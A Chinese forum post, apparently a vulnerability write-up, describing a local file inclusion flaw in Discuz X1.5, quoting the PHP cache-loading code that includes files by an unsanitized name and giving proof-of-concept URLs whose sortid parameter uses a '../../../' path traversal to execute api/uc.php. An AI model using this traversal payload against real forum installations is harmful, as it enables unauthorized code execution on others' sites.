[漏洞分析] DISCUZ X1.5 本地文件包含漏洞说明

4 主题	0 回帖	0 积分

热心网友

金币: 0
阅读权限: 220
精华: 0
威望: 0
贡献: 0
在线时间: 0 小时
注册时间: 2012-4-4

发消息

发表于 2011-3-11 11:44:47 | 显示全部楼层 |阅读模式

config_global.php

复制代码

代码如下:

　　$_config['cache']['type'] = ‘file’;
　　function cachedata($cachenames) {
　　……
　　$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
　　……
　　if($isfilecache) {
　　$lostcaches = array();
　　foreach($cachenames as $cachename) {
　　if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
　　$lostcaches[] = $cachename;
　　}
　　}
　　……
　　}

　　地址：
　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
　　执行了 api/uc.php 页面代码了。
　　作者： Jannock

使用道具举报

返回列表发新帖

[漏洞分析] DISCUZ X1.5 本地文件包含漏洞说明

浏览过的版块